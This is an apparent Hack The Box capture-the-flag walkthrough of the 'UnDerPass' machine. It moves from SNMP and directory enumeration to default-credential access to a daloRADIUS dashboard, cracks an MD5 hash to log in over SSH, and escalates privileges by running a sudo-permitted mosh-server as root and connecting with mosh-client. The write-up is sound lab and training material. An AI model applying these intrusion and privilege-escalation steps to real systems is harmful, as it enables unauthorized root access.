Try to navigate to the web, no something interesting
Lets fuzz for directories using FFUF
Also there is no any thing interesting, Okay let's try to scan for UDP ports
Okay, I will use snmpwalk with public community string, but first let's see what's the version of SNMP
After some search about daloradius server in this string UnDerPass.htb is the only daloradius server in the basin! I found that there is a login page for dashboard in this link
Searching for default creds found
I found svcMosh with MD5 hash password after crack it with hashcat
$ ssh svcMosh@10.10.11.48
svcMosh@10.10.11.48's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu Dec 19 01:40:28 PM UTC 2024
System load: 0.05 Processes: 251
Usage of /: 84.2% of 3.75GB Users logged in: 0
Memory usage: 9% IPv4 address for eth0: 10.10.11.48
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Dec 29 11:18:59 2024 from 10.10.16.25
svcMosh@underpass:~$
$ sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
svcMosh@underpass:~$ sudo /usr/bin/mosh-server
MOSH CONNECT 60001 vNMTT5tuoQeTJ5IiIst8Gw
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 109656]
svcMosh@underpass:~$ MOSH_KEY=vNMTT5tuoQeTJ5IiIst8Gw mosh-client 127.0.0.1 60001